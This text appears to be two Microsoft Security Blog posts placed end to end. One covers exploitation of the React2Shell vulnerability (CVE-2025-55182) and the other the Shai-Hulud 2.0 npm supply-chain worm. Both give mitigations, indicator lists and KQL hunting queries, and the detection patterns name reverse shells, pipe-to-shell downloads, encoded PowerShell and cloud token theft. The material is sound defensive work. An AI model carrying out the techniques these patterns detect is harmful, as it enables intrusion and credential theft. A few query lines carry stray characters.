We identified several hundred machines across a diverse set of organizations compromised using common tactics, techniques, and procedures (TTPs) observed with web application RCE. To exploit CVE-2025-55182, an attacker sends a crafted input to a web application running React Server Components functions in the form of a POST request. This input is then processed as a serialized object and passed to the backend server, where it is deserialized. Due to the default trust among the components, the attacker-provided input is then deserialized and the backend runs attacker-provided code under the NodeJS runtime.

Post-exploitation, attackers were observed to run arbitrary commands, such as reverse shells to known Cobalt Strike servers. To achieve persistence, attackers added new malicious users, utilized remote monitoring and management (RMM) tools such as MeshAgent, modified authorized_keys file, and enabled root login. To evade security defenses, the attackers downloaded from attacker-controlled CloudFlare Tunnel endpoints (for example, *.trycloudflare.com) and used bind mounts to hide malicious processes and artifacts from system monitoring tools.

The malware payloads seen in campaigns investigated by Microsoft Defender vary from remote access trojans (RATs) like VShell and EtherRAT, the SNOWLIGHT memory-based malware downloader that enabled attackers to deploy more payloads to target environments, ShadowPAD, and XMRig cryptominers. The attacks proceeded by enumerating system details and environment variables to enable lateral movement and credential theft.

Credentials that were observed to be targeted included Azure Instance Metadata Service (IMDS) endpoints for Azure, Amazon Web Services (AWS), Google Cloud Platform (GCP), and Tencent Cloud to acquire identity tokens, which could be used to move laterally to other cloud resources. Attackers also deployed secret discovery tools such as TruffleHog and Gitleaks, along with custom scripts to extract several different secrets. Attempts to harvest AI and cloud-native credentials, such as OpenAI API keys, Databricks tokens, and Kubernetes service‑account credentials were also observed. Azure Command-Line Interface (CLI) (az) and Azure Developer CLI (azd) were also used to obtain tokens.

Mitigation and protection guidance

Microsoft recommends customers to act on these mitigation recommendations:

Manual identification guidance

Until full in-product coverage is available, you can manually assess exposure on servers or containers:

1. Navigate to your project directory and open the node_modules folder.
2. Review installed packages and look for:
   • react-server-dom-webpack
   • react-server-dom-parcel
   • react-server-dom-turbopack
   • next
3. Validate versions against the known affected range:
   • React: 19.0.0,19.1.0, 19.1.1, 19.2.0
   • Next.js: 15.0.0 – 15.0.4, 15.1.0 – 15.1.8, 15.2.0 – 15.2.5, 15.3.0 – 15.3.5, 15.4.0 – 15.4.7, 15.5.0 – 15.5.6, 16.0.0 – 16.0.6, 14.3.0-canary.77 and later canary releases
4. If any of these packages match the affected versions, remediation is required. Prioritize internet-facing assets first, especially those identified by Defender as externally exposed.

Mitigation best practices

1. Patch immediately
   • React and Next.js have released fixes for the impacted packages. Upgrade to one of the following patched versions (or later within the same release line):
     • React: 19.0.1, 19.1.2, 19.2.1
     • Next.js: 5.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7
   • Because many frameworks and bundlers rely on these packages, make sure your framework-level updates also pull in the corrected dependencies.
2. Prioritize exposed services
   • Patch all affected systems, starting with internet-facing workloads.
   • Use Microsoft Defender Vulnerability Management (MDVM) to surface vulnerable package inventory and to track remediation progress across your estate.
3. Monitor for exploit activity
   • Review MDVM dashboards and Defender alerts for indicators of attempted exploitation.
   • Correlate endpoint, container, and cloud signals for higher confidence triage.
   • Invoke incident response process to address any related suspicious activity stemming from this vulnerability.
4. Add WAF protections where appropriate
   • Apply Azure Web Application Firewall (WAF) custom rules for Application Gateway and Application Gateway for Containers to help block exploit patterns while patching is in progress. Microsoft has published rule guidance and JSON examples in the Azure Network Security Blog, with ongoing updates as new attack permutations are identified.

Recommended customer action checklist

• Identify affected React Server Components packages in your applications and images.
• Upgrade to patched versions. Refer to the React page for patching guidance.
• Prioritize internet-facing services for emergency change windows.
• Enable and monitor Defender alerts tied to React Server Components exploitation attempts.
• Apply Azure WAF custom rules as a compensating control where feasible.
• Use MDVM to validate coverage and confirm risk reduction post-update.

CVE-2025-55182 represents a high-impact, low-friction attack path against modern React Server Components deployments. Rapid patching combined with layered Defender monitoring and WAF protections provides the strongest short-term and long-term risk reduction strategy.

Microsoft Defender XDR detections 

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

In many cases subsequent activity post exploitation was detected and following alerts were triggered on the victim devices. Note that the following alerts below can also be triggered by unrelated threat activity.

Automatic attack disruption through Microsoft Defender for Endpoint alerts

To better support customers in the event of exploitation, we are expanding our detection framework to identify and alert on CVE-2025-55182 activity across all operating systems for Microsoft Defender for Endpoint customers. These detections are integrated with automatic attack disruption.

When these alerts, combined with other signals, provide high confidence of active attacker behavior, automatic attack disruption can initiate autonomous containment actions to help stop the attack and prevent further progression.

Microsoft Defender Vulnerability Management and Microsoft Defender for Cloud

Microsoft Defender for Cloud rolled out support to surface CVE-2025-55182 with agentless scanning across containers and cloud virtual machines (VMs). Follow the documentation on how to enable agentless scanning:

• Protect your servers with Defender for Servers
• Defender for Containers Deployment Overview

Microsoft Defender Vulnerability Management (MDVM) can surface impacted Windows, Linux, and macOS devices. In addition, MDVM and Microsoft Defender for Cloud dashboards can surface:

• Identification of exposed assets in the organization
• Clear remediation guidance tied to your affected assets and workloads

Microsoft Security Copilot

Security Copilot customers can use the standalone experience to create their own prompts or run the following prebuilt promptbooks to automate incident response or investigation tasks related to this threat:

• Incident investigation
• Microsoft User analysis
• Threat actor profile
• Threat Intelligence 360 report based on MDTI article
• Vulnerability impact assessment

Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.

Threat intelligence reports

Microsoft Defender XDR customers can use the following threat analytics reports in the Defender portal (requires license for at least one Defender XDR product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender XDR threat analytics

• Vulnerability Profile: CVE-2025-55182 – React Server Components

Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.

Hunting queries and recommendations

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following query to find related activity in their networks:

Detect potential React2Shell command injection attempt

CloudAuditEvents
| where (ProcessCommandLine == "/bin/sh -c (whoami)" and (ParentProcessName == "node" or ParentProcessName has "next-server"))
        or (ProcessCommandLine has_any ("echo","powershell") and ProcessCommandLine matches regex @'(echo\s+\$\(\(\d+\*\d+\)\)|powershell\s+-c\s+"\d+\*\d+")')
| project Timestamp, KubernetesPodName, KubernetesNamespace, ContainerName, ContainerId, ContainerImageName, FileName, ProcessName, ProcessCommandLine, ProcessCurrentWorkingDirectory, ParentProcessName, ProcessId, ParentProcessId, AccountName

Identify encoded PowerShell attempts

let lookback = 10d;
DeviceProcessEvents
| where Timestamp >= ago(lookback)
| where InitiatingProcessParentFileName has "node"
| where InitiatingProcessCommandLine  has_any ("next start", "next-server") or ProcessCommandLine  has_any ("next start", "next-server")
| summarize  make_set(InitiatingProcessCommandLine), make_set(ProcessCommandLine) by DeviceId, Timestamp
//looking for powershell activity
| where set_ProcessCommandLine  has_any ("cmd.exe","powershell")
| extend decoded_powershell_1 = replace_string(tostring(base64_decode_tostring(tostring(split(tostring(split(set_ProcessCommandLine.[0],"EncodedCommand ",1).[0]),'"',0).[0]))),"\0","")
| extend decoded_powershell_1b = replace_string(tostring(base64_decode_tostring(tostring(split(tostring(split(set_ProcessCommandLine.[0],"Enc ",1).[0]),'"',0).[0]))),"\0","")
| extend decoded_powershell_2 = replace_string(tostring(base64_decode_tostring(tostring(split(tostring(split(set_ProcessCommandLine.[0],"enc ",1).[0]),'"',0).[0]))),"\0","")
| extend decoded_powershell_3 = replace_string(tostring(base64_decode_tostring(tostring(split(tostring(split(set_ProcessCommandLine.[0],"ec ",1).[0]),'"',0).[0]))),"\0","")
| where set_ProcessCommandLine !has "'powershell -c " 
| extend decoded_powershell = iff( isnotempty( decoded_powershell_1),decoded_powershell_1, 
                                                    iff(isnotempty( decoded_powershell_2), decoded_powershell_2,
                                                        iff(isnotempty( decoded_powershell_3), decoded_powershell_3,decoded_powershell_1b)))
| project-away decoded_powershell_1, decoded_powershell_1b, decoded_powershell_2,decoded_powershell_3
| where isnotempty( decoded_powershell)

Identify execution of suspicious commands initiated by the next-server parent process post-exploitation

let lookback = 10d;
DeviceProcessEvents
| where Timestamp >= ago(lookback)
| where InitiatingProcessFileName =~ "node.exe" and InitiatingProcessCommandLine has ".js"
| where FileName =~ "cmd.exe"
| where (ProcessCommandLine has_any (@"\next\", @"\npm\npm\node_modules\", "\\server.js")
    and (ProcessCommandLine has_any ("powershell -c \"", "curl", "wget", "echo $", "ipconfig", "start msiexec", "whoami", "systeminfo", "$env:USERPROFILE", "net user", "net group", "localgroup administrators",  "-ssh", "set-MpPreference", "add-MpPreference", "rundll32", "certutil", "regsvr32", "bitsadmin", "mshta", "msbuild")   
         or (ProcessCommandLine has "powershell" and
             (ProcessCommandLine has_any ("Invoke-Expression", "DownloadString", "DownloadFile", "FromBase64String", "Start-Process", "System.IO.Compression", "System.IO.MemoryStream", "iex ", "iex(", "Invoke-WebRequest", "iwr ", ".UploadFile", "System.Net.WebClient")
                or ProcessCommandLine matches regex @"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\s[A-Za-z0-9+/=]{15,}"))))
   or ProcessCommandLine matches regex @'cmd\.exe\s+/d\s+/s\s+/c\s+"powershell\s+-c\s+"[0-9]+\*[0-9]+""'

Identify execution of suspicious commands initiated by the next-server parent process post-exploitation

let lookback = 10d;
DeviceProcessEvents
| where Timestamp >= ago(lookback)
| where InitiatingProcessFileName == "node"
| where InitiatingProcessCommandLine has_any (" server.js", " start", "/server.js")
| where ProcessCommandLine  has_any ("| sh", "openssl,", "/dev/tcp/", "| bash", "|sh", "|bash", "bash,", "{sh,}", "SOCK_STREAM", "bash -i", "whoami", "| base64 -d", "chmod +x /tmp", "chmod 777")
| where ProcessCommandLine !contains "vscode" and ProcessCommandLine !contains "/.claude/"  and ProcessCommandLine !contains "/claude"

Microsoft Defender XDR’s blast radius analysis capability, incorporated into the incident investigation view, allows security teams to visualize and understand the business impact of a security compromise by showing potential propagation paths towards the organization’s critical assets before it escalates into a full blown incident. This capability merges pre-breach estate understanding with post-breach views allowing security teams to map their interconnected assets and highlights potential paths teams can prioritize for remediation efforts based on the criticality of assets and their interconnectivity to the compromised entities.

Microsoft Defender for Cloud

Microsoft Defender for Cloud customers can use security explorer templates to locate exposed containers running vulnerable container images and vulnerable virtual machines. Template titled Internet exposed containers running container images vulnerable to React2Shell vulnerability CVE-2025-55182 and Internet exposed virtual machines vulnerable to React2Shell vulnerability CVE-2025-55182 are added to the gallery.

Microsoft Security Exposure Management

Microsoft Security Exposure Management’s automated attack path analysis maps out potential threats by identifying exposed resources and tracing the routes an attacker might take to compromise critical assets. This analysis highlights vulnerable cloud compute resources, such as virtual machines and Kubernetes containers, that are susceptible to remote code execution vulnerabilities, including React2Shell CVEs. It also outlines possible lateral movement steps an adversary might take within the environment. The attack paths are presented for all supported cloud environments, including Azure, AWS, and GCP.

To view these paths, filter the view in Microsoft Security Exposure Management, filter by entry point type:

• Kubernetes container
• Virtual Machine
• AWS EC2 instance
• GCP compute instance.

Alternatively, in Microsoft Defender for Cloud, customers can filter by titles such as:

• Internet exposed container with high severity vulnerabilities
• Internet exposed Azure VM with RCE vulnerabilities
• Internet exposed GCP compute instance with RCE vulnerabilities
• Internet exposed AWS EC2 instance with RCE vulnerabilities

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. 

Detect network IP and domain indicators of compromise using ASIM

//IP list and domain list- _Im_NetworkSession
let lookback = 30d;
let ioc_ip_addr = dynamic(["194.69.203.32", "162.215.170.26", "216.158.232.43", "196.251.100.191", "46.36.37.85", "92.246.87.48"]);
let ioc_domains = dynamic(["anywherehost.site", "xpertclient.net", "superminecraft.net.br", "overcome-pmc-conferencing-books.trycloudflare.com", "donaldjtrmp.anondns.net", "labubu.anondns.net", "krebsec.anondns.net", "hybird-accesskey-staging-saas.s3.dualstack.ap-northeast-1.amazonaws.com", "ghostbin.axel.org", "194.69.203.32:81", "194.69.203.32:81", "194.69.203.32:81", "162.215.170.26:3000", "216.158.232.43:12000", "overcome-pmc-conferencing-books.trycloudflare.com", "donaldjtrmp.anondns.net:1488", "labubu.anondns.net:1488", "krebsec.anondns.net:2316/dong", "hybird-accesskey-staging-saas.s3.dualstack.ap-northeast-1.amazonaws.com", "ghostbin.axel.org"]);n_Im_NetworkSession(starttime=todatetime(ago(lookback)), endtime=now())n| where DstIpAddr in (ioc_ip_addr) or DstDomain has_any (ioc_domains)
| summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated),
  EventCount=count() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor

Detect Web Sessions IP and file hash indicators of compromise using ASIM

//IP list - _Im_WebSession
let lookback = 30d;
let ioc_ip_addr = dynamic(["194.69.203.32", "162.215.170.26", "216.158.232.43", "196.251.100.191", "46.36.37.85", "92.246.87.48"]);
let ioc_sha_hashes =dynamic(["c2867570f3bbb71102373a94c7153239599478af84b9c81f2a0368de36f14a7c", "9e9514533a347d7c6bc830369c7528e07af5c93e0bf7c1cd86df717c849a1331", "b63860cefa128a4aa5d476f300ac45fd5d3c56b2746f7e72a0d27909046e5e0f", "d60461b721c0ef7cfe5899f76672e4970d629bb51bb904a053987e0a0c48ee0f", "d3c897e571426804c65daae3ed939eab4126c3aa3fa8531de5e8f0b66629fe8a", "d71779df5e4126c389e7702f975049bd17cb597ebcf03c6b110b59630d8f3b4d", "b5acbcaccc0cfa54500f2bbb0745d4b5c50d903636f120fc870082335954bec8", "4cbdd019cfa474f20f4274310a1477e03e34af7c62d15096fe0df0d3d5668a4d", "f347eb0a59df167acddb245f022a518a6d15e37614af0bbc2adf317e10c4068b", "661d3721adaa35a30728739defddbc72b841c3d06aca0abd4d5e0aad73947fb1", "876923709213333099b8c728dde9f5d86acfd0f3702a963bae6a9dde35ba8e13", "2ebed29e70f57da0c4f36a9401a7bbd36e6ddd257e0920aa4083240afa3a6457", "f1ee866f6f03ff815009ff8fd7b70b902bc59b037ac54b6cae9b8e07beb854f7", "7e90c174829bd4e01e86779d596710ad161dbc0e02a219d6227f244bf271d2e5"]);b_Im_WebSession(starttime=todatetime(ago(lookback)), endtime=now())b| where DstIpAddr in (ioc_ip_addr) or FileSHA256 in (ioc_sha_hashes)
| summarize imWS_mintime=min(TimeGenerated), imWS_maxtime=max(TimeGenerated),
  EventCount=count() by SrcIpAddr, DstIpAddr, Url, Dvc, EventProduct, EventVendor

Detect domain and URL indicators of compromise using ASIM

// Domain list - _Im_WebSession
let ioc_domains = dynamic(["anywherehost.site", "xpertclient.net", "superminecraft.net.br", "overcome-pmc-conferencing-books.trycloudflare.com", "donaldjtrmp.anondns.net", "labubu.anondns.net", "krebsec.anondns.net", "hybird-accesskey-staging-saas.s3.dualstack.ap-northeast-1.amazonaws.com", "ghostbin.axel.org", "194.69.203.32:81", "194.69.203.32:81", "194.69.203.32:81", "162.215.170.26:3000", "216.158.232.43:12000", "overcome-pmc-conferencing-books.trycloudflare.com", "donaldjtrmp.anondns.net:1488", "labubu.anondns.net:1488", "krebsec.anondns.net:2316/dong", "hybird-accesskey-staging-saas.s3.dualstack.ap-northeast-1.amazonaws.com", "ghostbin.axel.org"]);
_Im_WebSession (url_has_any = ioc_domains)

Detect files hashes indicators of compromise using ASIM

// file hash list - imFileEvent
let ioc_sha_hashes = dynamic(["c2867570f3bbb71102373a94c7153239599478af84b9c81f2a0368de36f14a7c", "9e9514533a347d7c6bc830369c7528e07af5c93e0bf7c1cd86df717c849a1331", "b63860cefa128a4aa5d476f300ac45fd5d3c56b2746f7e72a0d27909046e5e0f", "d60461b721c0ef7cfe5899f76672e4970d629bb51bb904a053987e0a0c48ee0f", "d3c897e571426804c65daae3ed939eab4126c3aa3fa8531de5e8f0b66629fe8a", "d71779df5e4126c389e7702f975049bd17cb597ebcf03c6b110b59630d8f3b4d", "b5acbcaccc0cfa54500f2bbb0745d4b5c50d903636f120fc870082335954bec8", "4cbdd019cfa474f20f4274310a1477e03e34af7c62d15096fe0df0d3d5668a4d", "f347eb0a59df167acddb245f022a518a6d15e37614af0bbc2adf317e10c4068b", "661d3721adaa35a30728739defddbc72b841c3d06aca0abd4d5e0aad73947fb1", "876923709213333099b8c728dde9f5d86acfd0f3702a963bae6a9dde35ba8e13", "2ebed29e70f57da0c4f36a9401a7bbd36e6ddd257e0920aa4083240afa3a6457", "f1ee866f6f03ff815009ff8fd7b70b902bc59b037ac54b6cae9b8e07beb854f7", "7e90c174829bd4e01e86779d596710ad161dbc0e02a219d6227f244bf271d2e5"]);dimFileEventd| where SrcFileSHA256 in (ioc_sha_hashes) or
TargetFileSHA256 in (ioc_sha_hashes)
| extend AccountName = tostring(split(User, @'')[1]), 
  AccountNTDomain = tostring(split(User, @'')[0])
| extend AlgorithmType = "SHA256"

Find use of reverse shells

This query looks for potential reverse shell activity initiated by cmd.exe or PowerShell. It matches the use of reverse shells in this attack: reverse-shell-nishang.

Indicators of compromise

The list below is non-exhaustive and does not represent all indicators of compromise observed in the known campaigns:

References

• Critical Security Vulnerability in React Server Components – React
• NVD – CVE-2025-55182
• CVE-2025-55182 (React2Shell) Opportunistic Exploitation In The Wild: What The GreyNoise Observation Grid Is Seeing So Far

Learn more  

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.

The guidance provided in this blog post represents general best practices and is intended for informational purposes only. Customers remain responsible for evaluating and implementing security measures appropriate for their environments.

The post Defending against the CVE-2025-55182 (React2Shell) vulnerability in React Server Components appeared first on Microsoft Security Blog.

The Shai‑Hulud 2.0 campaign builds on earlier supply chain compromises but introduces more automation, faster propagation, and a broader target set:

• Malicious code executes during the preinstall phase of infected npm packages, allowing execution before tests or security checks.
• Attackers have compromised maintainer accounts from widely used projects (for example, Zapier, PostHog, Postman).
• Stolen credentials are exfiltrated to public attacker-controlled repositories, which could lead to further compromise.

This campaign illustrates the risks inherent to modern supply chains:

• Traditional network defenses are insufficient against attacks embedded in trusted package workflows.
• Compromised credentials enable attackers to escalate privileges and move laterally across cloud workloads.

In defending against threats like Shai-Hulud 2.0, organizations benefit significantly from the layered protection from Microsoft Defender, which provides security coverage from code, to posture management, to runtime. This defense-in-depth approach is especially valuable when facing supply chain-driven attacks that might introduce malicious dependencies that evade traditional vulnerability assessment tools. In these scenarios, the ability to correlate telemetry across data planes, such as endpoint or container behavior and runtime anomalies, becomes essential. Leveraging these insights enables security teams to rapidly identify compromised devices, flag suspicious packages, and contain the threat before it propagates further.

This blog provides a high-level overview of Shai‑Hulud 2.0, the attack mechanisms, potential attack propagation paths, customized hunting queries, and the actions Microsoft Defender is taking to enhance detection, attack-path analysis, credential scanning, and supply chain hardening.

Analyzing the Shai-Hulud 2.0 attack

Multiple npm packages were compromised when threat actors added a preinstall script named set_bun.js in the package.json of the affected packages. The setup_bun.js script scoped the environment for an existing Bun runtime binary; if not found, the script installed it. Bun can be used in the same way Node.js is used.

The Bun runtime executed the bundled malicious script bun_environment.js. This script downloaded and installed a GitHub Actions Runner archive. It then configured a new GitHub repository and a runner agent called SHA1Hulud. Additional files were extracted from the archive including, TruffleHog and Runner.Listener executables. TruffleHog was used to query the system for stored credentials and retrieve stored cloud credentials.

Microsoft Defender for Containers promptly notified our customers when the campaign began through the alert Suspicious usage of the shred command on hidden files detected. This alert identified the data destruction activity carried out as part of the campaign. Additionally, we introduced a dedicated alert to identify this campaign as Sha1-Hulud Campaign Detected – Possible command injection to exfiltrate credentials.

In some cases, commits to the newly created repositories were under the name “Linus Torvalds”, the creator of the Linux kernel and the original author of Git.  The use of fake personas highlights the importance of commit signature verification, which adds a simple and reliable check to confirm who actually created a commit and reduces the chance of impersonation.

Mitigation and protection guidance

Microsoft Defender recommends the following guidance for customers to improve their environments’ security posture against Shai-Hulud:

• Review the Key Vault assets on the critical asset management page and investigate any relevant logs for unauthorized access.
• Rapidly rotate and revoke exposed credentials.
• Isolate affected CI/CD agents or workspaces.
• Prioritize high-risk attack paths to reduce further exposure.
• Remove unnecessary roles and permissions granted to identities assigned to CI/CD pipelines; specifically review access to key vaults.
• For Defender for Cloud customers, read on the following recommendation:
  • As previously indicated, the attack was initiated during the preinstall phase of compromised npm packages. Consequently, cloud compute workloads that rely on these affected packages present a lower risk compared to those involved in the build phase. Nevertheless, it is advisable to refrain from using such packages within cloud workloads. Defender for Cloud conducts thorough scans of workloads and prompts users to upgrade or replace any compromised packages if vulnerable versions are detected. Additionally, it references the code repository from which the image was generated to facilitate effective investigation.
  • To receive code repository mapping, make sure to connect your DevOps environments to Defender for Cloud. Refer to the following documentation for guidance on:
    • Connecting Azure DevOps to Defender for Cloud
    • Connecting GitHub environment to Defender for Cloud
    • Connecting GitLab environment to Defender for Cloud
    • Deploying Defender CLI for container image scan

• For npm maintainers:
  • Use npm trusted publishing instead of tokens. Strengthen publishing settings on accounts, organizations, and packages to require two-factor authentication (2FA) for any writes and publishing actions.
  • When configuring two-factor authentication, use WebAuthn instead of a time-based, one-time password (TOTP).
• To combat this evolving threat, we are also introducing a new functionality in Microsoft Defender for Cloud that identifies Shai-Hulud 2.0 packages by leveraging agentless code scanning. This capability works by creating a Software Bill of Materials (SBOM) in the background and performing a lookup to identify if any package in the filesystem or source code repository is a malicious package that could be a component of the Shai-Hulud attack. By decoupling security analysis from runtime execution, this approach ensures that deep dependency threats are detected without impacting the performance of workloads or pipelines.
  • If malicious packages are found, recommendations in Microsoft Defender for Cloud provide immediate visibility into compromised assets as shown below. This ensures that security teams can act quickly to freeze dependencies and rotate credentials before further propagation occurs.
  • The next recommended step for customers is to start scanning repositories and protecting supply chains. Learn how to set up connectors.

• Turn on cloud-delivered protection and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
• Turn on attack surface reduction rules, particularly on blocking executable files from running unless they meet a prevalence, age or trusted list criterion and blocking execution of potentially obfuscated scripts.

For more information on GitHub’s plans on securing the npm supply chain and what npm maintainers can take today, Defender also recommends checking the Github plan for a more secure npm supply chain.

Microsoft Defender XDR detections 

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, and apps to provide integrated protection against attacks like the threat discussed in this blog.

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

Microsoft Security Copilot

Security Copilot customers can use the standalone experience to create their own prompts or run the following prebuilt promptbooks to automate incident response or investigation tasks related to this threat:

• Incident investigation
• Microsoft User analysis
• Threat actor profile
• Threat Intelligence 360 report based on MDTI article
• Vulnerability impact assessment

Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.

Threat intelligence reports

Microsoft Defender XDR customers can use the following threat analytics reports in the Defender portal (requires license for at least one Defender XDR product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender XDR threat analytics:

• Activity Profile: From vulnerable workflows to self-replicating malware: Technical analysis of npm supply chain security incidents

Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.

Attack path analysis

Attack path analysis shows paths from exposed entry points to targets. Security teams can use attack path analysis to surface cross-domain exposure risks, for example how an attacker could move from externally reachable resources to sensitive systems to escalate privileges and maintain persistence. While supply chain attacks like those used by Shai-Hulud 2.0 can originate without direct exposure, customers can leverage advanced hunting to query the Exposure Graph for these broader relationships.

For example, once a virtual or physical machine is determined to be compromised, key vaults that are directly accessible using credentials obtained from the compromised system can also be identified. The relevant access paths can be extracted using queries, as detailed in the hunting section below. Any key vault found along these paths should be investigated according to the mitigation guide.

Hunting queries 

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following queries to find related activity in their networks:

Attempts of malicious JS execution through node

DeviceProcessEvents 
| where FileName has "node" and ProcessCommandLine has_any ("setup_bun.js", "bun_environment.js")

Suspicious process launched by malicious JavaScript

DeviceProcessEvents | where InitiatingProcessFileName in~ ("node", "node.exe") and InitiatingProcessCommandLine endswith ".js"
| where (FileName in~ ("bun", "bun.exe") and ProcessCommandLine has ".js")
    or (FileName  in~ ("cmd.exe") and ProcessCommandLine has_any ("where bun", "irm ", "[Environment]::GetEnvironmentVariable('PATH'", "|iex"))
    or (ProcessCommandLine in~ ("sh", "dash", "bash") and ProcessCommandLine has_any ("which bun", ".bashrc && echo $PATH", "https://bun.sh/install"))
| where ProcessCommandLine !contains "bun" and ProcessCommandLine !contains "\\" and ProcessCommandLine !contains "--"

GitHub exfiltration

DeviceProcessEvents | where FileName has_any ("bash","Runner.Listener","cmd.exe") | where ProcessCommandLine has 'SHA1HULUD' and not (ProcessCommandLine has_any('malicious','grep','egrep',"checknpm","sha1hulud-checker-ado","sha1hulud-checker-ado"," sha1hulud-checker-github","sha1hulud-checker","sha1hulud-scanner","go-detector","SHA1HULUD_IMMEDIATE_ACTIONS.md","SHA1HULUD_COMPREHENSIVE_REPORT.md","reddit.com","sha1hulud-scan.sh"))

Paths from compromised machines and repositories to cloud key management services

let T_src2Key = ExposureGraphEdges
| where EdgeLabel == 'contains'
| where SourceNodeCategories has_any ('code_repository', 'virtual_machine' , 'physical_device')
| where TargetNodeCategories has 'secret'
| project SourceNodeId, SourceNodeLabel, SourceNodeName, keyNodeId=TargetNodeId, keyNodeLabel=TargetNodeLabel;
let T_key2identity = ExposureGraphEdges
| where EdgeLabel == 'can authenticate as'
| where SourceNodeCategories has 'key'
| where TargetNodeCategories has 'identity'
| project keyNodeId=SourceNodeId, identityNodeId=TargetNodeId;
ExposureGraphEdges
| where EdgeLabel == 'has permissions to'
| where SourceNodeCategories has 'identity'
| where TargetNodeCategories has "keys_management_service"
| join hint.strategy=shuffle kind=inner (T_key2identity) on $left.SourceNodeId==$right.identityNodeId
| join hint.strategy=shuffle kind=inner (T_src2Key) on keyNodeId
| join hint.strategy=shuffle kind=inner (ExposureGraphNodes | project NodeId, srcEntityId=EntityIds) on $left.SourceNodeId1==$right.NodeId
| join hint.strategy=shuffle kind=inner (ExposureGraphNodes | project NodeId, identityEntityId=EntityIds) on $left.identityNodeId==$right.NodeId
| join hint.strategy=shuffle kind=inner (ExposureGraphNodes | project NodeId, kmsEntityId=EntityIds) on $left.TargetNodeId==$right.NodeId
| project srcLabel=SourceNodeLabel1, srcName=SourceNodeName1, srcEntityId, keyNodeLabel, identityLabel=SourceNodeLabel,
    identityName=SourceNodeName, identityEntityId, kmsLabel=TargetNodeLabel, kmsName=TargetNodeName, kmsEntityId
| extend Path = strcat('srcLabel',' contains','keyNodeLabel',' can authenticate as', ' identityLabel', ' has permissions to', ' kmsLabel')

Setup of the GitHub runner with the malicious repository and downloads of the malicious bun.sh script that facilitates this

CloudProcessEvents
| where  (ProcessCommandLine has "--name SHA1HULUD" ) or (ParentProcessName == "node" and (ProcessName == "bash" or ProcessName == "dash" or ProcessName == "sh") and ProcessCommandLine has "curl -fsSL https://bun.sh/install | bash")
| project Timestamp, AzureResourceId, KubernetesPodName, KubernetesNamespace, ContainerName, ContainerId, ContainerImageName, ProcessName, ProcessCommandLine, ProcessCurrentWorkingDirectory, ParentProcessName, ProcessId, ParentProcessId, AccountName

Credential collection using TruffleHog and Azure CLI

CloudProcessEvents
| where (ParentProcessName == "bun" and ProcessName in ("bash","dash","sh") and ProcessCommandLine has_any("az account get-access-token","azd auth token")) or
        (ParentProcessName == "bun" and ProcessName == "tar" and ProcessCommandLine has_any ("trufflehog","truffler-cache"))
| project Timestamp, AzureResourceId, KubernetesPodName, KubernetesNamespace, ContainerName, ContainerId, ContainerImageName, ProcessName, ProcessCommandLine, ProcessCurrentWorkingDirectory, ParentProcessName, ProcessId, ParentProcessId, AccountName

Cloud security explorer

Microsoft Defender for Cloud customers can also use cloud security explorer to surface possibly compromised software packages. The following screenshot represents a query that searches for a virtual machine or repository allowing lateral movement to a key vault. View the query builder.

The security explorer templates library has been expanded with two additional queries that retrieve all container images with compromised software packages and all the running containers with these images.

Another means for security teams to proactively identify the scope of this threat is by leveraging the Cloud Security Explorer to query the granular Software Bill of Materials (SBOM) generated by agentless scanners. This capability allows you to execute dynamic, graph-based queries across your entire multi-cloud estate—including virtual machines, containers, and code repositories—to pinpoint specific software components and their versions without the need for agent deployment.

For the Shai-Hulud 2.0 campaign, you can use the Cloud Security Explorer to map your software inventory directly to the list of known malicious packages. By running targeted queries that search for the specific compromised package names identified in our threat intelligence, you can instantly visualize the blast radius of the attack within your environment. This enables you to locate every asset containing a malicious dependency and prioritize remediation efforts effectively.

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. 

Indicators of compromise   

References

